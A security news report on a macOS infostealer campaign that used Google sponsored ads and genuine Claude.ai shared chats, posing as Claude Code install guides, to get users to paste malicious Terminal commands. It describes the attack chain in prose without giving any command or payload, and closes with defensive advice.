Mac Users Targeted Through Claude.ai and Google Ads
Cybercriminals are turning trusted web addresses into delivery routes for macOS malware, using Google’s sponsored search results and Claude.ai’s own shared-chat feature to lure users into running malicious Terminal commands.
The campaign, reported by BleepingComputer on May 10, 2026, targets people searching for Claude-related Mac downloads. Instead of sending victims to an obvious lookalike domain, the ads can display Anthropic’s legitimate claude.ai address. That makes the attack unusually convincing: the link itself may look clean, while the content behind it has been weaponized.
Security engineer Berk Albayrak first flagged the activity after finding a public Claude chat posing as a “Claude Code on Mac” installation guide. The page allegedly framed itself as if it came from Apple Support and instructed users to paste a command into macOS Terminal. According to the report, that command did not install a legitimate tool. It downloaded and executed malware.
BleepingComputer later found a second shared Claude chat using the same social-engineering playbook but relying on different infrastructure. Both versions abused a familiar habit among developers and technical users: copying a one-line install command from a web page and running it locally.
The malware chain used encoded shell instructions to fetch additional payloads from attacker-controlled servers. In one observed case, the first-stage script ran in memory, reducing obvious traces on disk. The server also changed the obfuscated payload on repeated requests, a tactic designed to make hash-based detection less reliable.
One variant checked the victim’s keyboard language settings before continuing. Systems configured with Russian or CIS-region input sources were reportedly skipped, while other machines were profiled. The script gathered details such as external IP address, hostname, macOS version, and keyboard locale before pulling down the next stage through macOS’s built-in scripting engine.
The final objective was credential theft. The malware was described as a MacSync infostealer variant capable of collecting browser credentials, cookies, and macOS Keychain data before sending the stolen material back to the attacker.
The campaign is notable because it weakens a common safety instinct: checking whether the domain looks legitimate. Here, the malicious instructions were hosted inside a real Claude.ai shared chat, so the problem was not just a fake website. It was hostile content living on a trusted platform and amplified through paid search.
For users, the lesson is blunt: do not treat sponsored results, AI-generated guides, or shared chats as trusted installation sources. Claude Code should be installed from Anthropic’s official documentation, and any command that asks for Terminal access should be reviewed carefully before running.
Sources: BleepingComputer, Anthropic Claude Code docs.